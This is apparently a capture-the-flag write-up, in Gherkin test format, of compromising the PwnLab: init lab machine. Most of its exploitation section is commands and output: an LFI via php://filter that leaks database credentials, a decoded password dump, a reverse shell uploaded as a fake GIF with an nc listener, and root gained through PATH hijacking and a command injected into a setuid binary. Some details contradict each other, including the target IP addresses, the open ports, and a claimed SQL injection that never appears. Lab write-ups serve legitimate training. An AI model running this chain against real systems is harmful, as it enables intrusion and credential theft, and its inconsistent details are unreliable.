## Version 1.4.1
## language: en

Feature:
  TOE:
    pwn_lab_init
  Category:
    SQL Injection and LFI
  Location:
    http://192.168.0.4:80
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
    CWE-98: Improper Control of Filename for Include/Require Statement in PHP
  Rule:
    Rule.173 Discard unsafe inputs
    REQ.043: Define a explicit content type
    REQ.040: The system must validate that the format (structure)
     of the files corresponds to its extension.
    REQ.041: The system must validate that the content of the files
     transferred to the same system is free of malicious code.
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Add type checks to restrict the uploadable file types

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Kali Linux        |  2020.3    |
    | Nmap              |  7.80      |
    | dirb              |  2.22      |
    | VirtualBox        |  6.1       |
    | Firefox           |  79.0      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 14:44 EDT
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.065s latency).
    Nmap scan report for pwnlab (192.168.0.4)
    Host is up (0.0055s latency).
    Nmap scan report for kali (192.168.0.10)
    Host is up (0.00013s latency).
    Nmap done: 256 IP addresses (3 hosts up) scanned in 3.13 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.11
    And it has the ports 22 and 80 open
    """
    $ sudo nmap -sV -sS 192.168.0.16
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 14:48 EDT
    Nmap scan report for pwnlab (192.168.0.4)
    Host is up (0.0014s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
    111/tcp  open  rpcbind 2-4 (RPC #100000)
    3306/tcp open  mysql   MySQL 5.5.47-0+deb8u1
    MAC Address: 08:00:27:3C:65:D7 (Oracle VirtualBox virtual NIC)

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.4:80/
    And the pwnlab homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the website does not show any vulnerabilities with the naked eye
    Then I proceeded to parse with dirb the directories on the server
    """
    $ dirb http://192.168.0.4:80/
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Mon Oct  5 14:52:54 2020
    URL_BASE: http://192.168.0.4:80/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.0.4:80/ ----
    ==> DIRECTORY: http://192.168.0.4:80/images/
    + http://192.168.0.4:80/index.php (CODE:200|SIZE:332)
    + http://192.168.0.4:80/server-status (CODE:403|SIZE:299)
    ==> DIRECTORY: http://192.168.0.4:80/upload/

    ---- Entering directory: http://192.168.0.4:80/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.0.4:80/upload/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    -----------------
    END_TIME: Mon Oct  5 14:53:04 2020
    DOWNLOADED: 4612 - FOUND: 2
    """
    Then I carefully checked the nmap report
    Given I access the site button login
    Then I see a message [evidences](03.png)

  Scenario: Exploitation
    Given the site is vulnerable to SQL injection and LFI
    Then the idea is to take advantage of vulnerability as a first validation
    And read the source code of the config.php files using curl
    """
    curl 'http://192.168.0.4/?page=config.php'

    <html>
    <head>
    <title>PwnLab Intranet Image Hosting</title>
    </head>
    <body>
    <center>
    <img src="images/pwnlab.png"><br />
    [ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ]
    [ <a href="?page=upload">Upload</a> ]
    <hr/><br/>
    </center>
    </body>
    </html>
    """
    Given the config.php file is not interpreted
    Then I proceed to investigate the protocols and wrappers supported by php
    And you'll find the php wrapper and its filter function
    Then it's used to filter the flow of data that reaches the app
    """
    curl -s http://host/?page=php://filter/convert.base64-encode/resource=confi
    <html>
    <head>
    <title>PwnLab Intranet Image Hosting</title>
    </head>
    <body>
    <center>
    <img src="images/pwnlab.png"><br />
    [ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ]
    [ <a href="?page=upload">Upload</a> ]
    <hr/><br/>
    PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHB
    hc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+</center>
    </body>
    </html>

    curl -s http://host/?page=php://filter/convert.base64-encode/resource=index
    <?php
    //Multilingual. Not implemented yet.
    //setcookie("lang","en.lang.php");
    if (isset($_COOKIE['lang']))
    {
    include("lang/".$_COOKIE['lang']);
    }
    // Not implemented yet.
    ?>
    <html>
    <head>
    <title>PwnLab Intranet Image Hosting</title>
    </head>
    <body>
    <center>
    <img src="images/pwnlab.png"><br />
    <html>
    <head>
    <title>PwnLab Intranet Image Hosting</title>
    </head>
    <body>
    <center>
    <img src="images/pwnlab.png"><br />
    [ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ]
    [ <a href="?page=upload">Upload</a> ]
    <hr/><br/>
    <?php
    if (isset($_GET['page']))
    {
    include($_GET['page'].".php");
    }
    else
    {
    echo "Use this server to upload and share image files inside the intranet";
    }
    ?>
    </center>
    </body>
    </html>
    """
    Given the response, the content returned by config.php is base64-encoded
    Then it is decoded by the following instruction
    """
    echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiO
    w0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+"
    | base64 -d

    <?php
    $server   = "localhost";
    $username = "root";
    $password = "H4u%QJ_H99";
    $database = "Users";
    ?>
    """
    Given the username, it starts session in the server MYSQL
    """
    mysql -u root -p -h 192.168.0.4
    Enter password:
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MySQL connection id is 48
    Server version: 5.5.47-0+deb8u1 (Debian)

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
    Type 'help;' or '\h' for help. Type '\c' to clear the current input

    MySQL [(none)]> show databases;

    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | Users              |
    +--------------------+
    2 rows in set (0.071 sec)

    MySQL [(none)]> use Users;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Database changed

    +------+------------------+
    | user | pass             |
    +------+------------------+
    | kent | Sld6WHVCSkpOeQ== |
    | mike | U0lmZHNURW42SQ== |
    | kane | aVN2NVltMkdSbw== |
    +------+------------------+
    3 rows in set (0.055 sec)
    """
    Given the answer, the base64 password is decoded for the kent user
    """
    echo "Sld6WHVCSkpOeQ==" | base64 -d
    JWzXuBJJNy
    """
    Given the password, it starts session on the website
    Then enables file upload [evidences](04.png)
    Then it is Validated and allowed files are png, jpg, jpeg, gif
    And are listed with an ID in /upload
    Then we use the magic bytes for gif (GIF89) in the header of revershell.php
    And be able to camouflage our reverse shell with extension .gif
    Then upload the file "revshell.php.gif" [evidences](06.png)
    Then to use nc to listen to port 4444
    """
    listening on [any] 4444 ...
    connect to [192.168.0.10] from pwnlab [192.168.0.4] 45120
    Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 i686
    21:22:17 up  1:26,  0 users,  load average: 0.00, 0.01, 0.05
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    """
    Given the vulnerability it is used Interactive Terminal Spawned via Python
    """
    $ python -c 'import pty; pty.spawn("/bin/bash")'
    www-data@pwnlab:/$ su kane
    su kane
    Password: iSv5Ym2GRo

    kane@pwnlab:/$ echo "/bin/sh" > cat
    echo "/bin/sh" > cat
    bash: cat: Permission denied
    kane@pwnlab:/$ cd var
    cd var
    kane@pwnlab:/var$ cd www
    cd www
    kane@pwnlab:/var/www$ cd html
    cd html
    kane@pwnlab:/var/www/html$ ./msgmike
    ./msgmike
    bash: ./msgmike: No such file or directory
    kane@pwnlab:/var/www/html$ cd
    cd
    kane@pwnlab:~$ strings msgmike | grep cat
    strings msgmike | grep cat
    cat /home/mike/msg.txt
    kane@pwnlab:~$ echo "/bin/sh" > cat
    echo "/bin/sh" > cat
    kane@pwnlab:~$ /bin/chmod 755 cat
    /bin/chmod 755 cat
    kane@pwnlab:~$ ls -la
    ls -la
    total 32
    drwxr-x--- 2 kane kane 4096 Oct  7 21:28 .
    drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
    -rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
    -rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
    -rwxr-xr-x 1 kane kane    8 Oct  7 21:28 cat
    -rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
    -rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
    kane@pwnlab:~$ export PATH=.:$PATH
    export PATH=.:$PATH
    kane@pwnlab:~$ ./msgmike
    ./msgmike
    $ whoami
    whoami
    mike
    $ ls
    ls
    cat  msgmike
    $ cd ..
    cd ..
    $ ls
    ls
    john  kane  kent  mike
    $ cd mike
    cd mike
    $ ls
    ls
    msg2root
    $ file msg2root
    file msg2root
    msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386,
    version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2,
    for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d
    $ ./msg2root
    ./msg2root
    Message for root: fwhibbit;/bin/sh
    fwhibbit;/bin/sh
    fwhibbit
    # id
    id
    gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
    # cd ..
    cd ..
    # pwd
    pwd
    /home
    # cd ..
    cd ..
    # cd root
    cd root
    # cat flag.txt
    cat flag.txt
    """
    Given the new privileges
    Then the flag is read [evidences](05.png)

  Scenario: Remediation
    Given The site is susceptible to SQL injection and LFI attacks
    Then there are many ways to defend against these types of attacks
    """
    1. Use of Prepared Statements (with Parameterized Queries)
    2. Use of Stored Procedures
    3. Whitelist Input Validation
    4. Escaping All User Supplied Input
    5. Among other
    """
    Given The website is vulnerable loaded files
    When The website is upload a file
    Then The file extensions must be verified
    """
    $allowed = array('gif', 'png', 'jpg');
    $filename = $_FILES['image']['name'];
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    if (!in_array($ext, $allowed)) {
      echo 'error';
    }
    """

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.6/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environmen
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-10-08
